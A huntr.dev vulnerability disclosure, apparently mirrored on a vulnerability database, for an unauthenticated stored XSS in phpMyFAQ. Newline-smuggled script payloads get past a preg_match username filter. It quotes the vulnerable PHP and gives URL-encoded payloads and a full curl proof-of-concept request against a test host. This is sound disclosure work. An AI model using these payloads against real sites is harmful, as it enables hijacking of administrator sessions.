Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrUgniusv5944F154-C0AB-4547-9D9D-3101E86EB975
HistoryNov 03, 2022 - 9:48 p.m.

Unauthenticated stored XSS via username & name parameters

2022-11-0321:48:40
ugniusv
www.huntr.dev
15
stored xss
unauthenticated
vulnerability
sanitization
username
name
database
dom
injection
attack
payload
url encoded
filter
poc
request
JSON

There is a stored XSS vulnerability due to improper sanitization of usernames. Vulnerable code User.php line 532:

    public function isValidLogin(string $login): bool
    {
        $login = (string)$login;

        if (strlen($login) < $this->loginMinLength || !preg_match($this->validUsername, $login)) {
            $this->errors[] = self::ERROR_USER_LOGIN_INVALID;

            return false;
        }

        return true;
    }

This code performs a loose filtering on $login parameter due to the use of preg_match function. The preg_match function only validates the first line of user-input. I.e. content after newline isn’t validated at all. Meaning that <script>alert(1)</script> is an invalid username but pwn <script>alert(1)</script> is a perfectly valid username. Or in URL encoded form: pwn%0A%3Cscript%3Ealert(1)%3C/script%3E.

Because of this, attackers can supply URL encoded XSS payloads which would bypass the filter such as:

realname=pwn%0A%3Cscript%3Ealert(1)%3C/script%3E&name=pwn%0A%3Cscript%3Ealert(1)%3C/script%3

Later on, the user with a malicious username is inserted into the database.
Finally, whenever admin user visits “List User page”. E.g. https://172-105-72-245.ip.linodeusercontent.com/phpmyfaq/admin/?action=user&user_action=listallusers the admin/user.php file is executed and attacker supplied input is interpolated into the DOM without any sanitization: <td>&lt;?= $user-&gt;getLogin() ?&gt;</td>

PoC:
Issue the following request to create a user with a username of pwn\n&lt;script&gt;alert(1)&lt;/script&gt;:

curl -i -s -k -X $'POST' \
    -H $'Host: 172-105-72-245.ip.linodeusercontent.com' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 137' -H $'Connection: close' \
    --data-binary $'lang=en&realname=pwn%0A%3Cscript%3Ealert(1)%3C/script%3E&name=pwn%0A%3Cscript%3Ealert(1)%3C/script%3E&email=kali%40kali.com&is_visible=on' \
    $'https://172-105-72-245.ip.linodeusercontent.com/phpmyfaq/ajaxservice.php?action=saveregistration'

Now visit the “List all users page”: https://172-105-72-245.ip.linodeusercontent.com/phpmyfaq/admin/?action=user&user_action=listallusers

XSS Payload will be triggered.

Please see occurrences section for a second Unauthenticated stored XSS vulnerability via name parameter.

JSON